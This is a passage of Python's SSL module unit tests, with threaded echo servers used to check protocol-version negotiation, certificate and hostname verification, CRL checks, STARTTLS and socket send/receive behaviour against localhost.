self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with closing(client_context.wrap_socket(socket.socket(),
server_hostname=sni_name)) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaisesRegexp(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="localhost")) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="invalid")) as s:
with self.assertRaisesRegexp(ssl.CertificateError,
"hostname 'invalid' doesn't match u?'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(socket.socket()) as s:
with self.assertRaisesRegexp(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"keycert.pem")
server = ThreadedEchoServer(SIGNED_CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=SIGNING_CA, chatty=False,
connectionchatty=False)
with server, \
closing(socket.socket()) as sock, \
closing(ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except socket.error as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with closing(socket.socket()) as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except socket.error:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except socket.error as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib2.urlopen(url, context=context)
try:
dlen = f.info().getheader("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = u"PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
self.assertRaises(NotImplementedError, s.dup)
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = ssl.wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = [None]
peer = [None]
def serve():
server.listen(5)
# Block on the accept and wait on the connection to close.
evt.set()
remote[0], peer[0] = server.accept()
remote[0].send(remote[0].recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote[0].close()
server.close()
# Sanity checks.
self.assertIsInstance(remote[0], ssl.SSLSocket)
self.assertEqual(peer[0], client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.check_hostname = True
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and master
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
s = client_context.wrap_socket(
socket.socket(),
server_hostname="localhost")
with self.assertRaises(ssl.SSLError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# disable all but TLS 1.3
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
s = context.wrap_socket(socket.socket())
with closing(s):
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], [
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
])
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
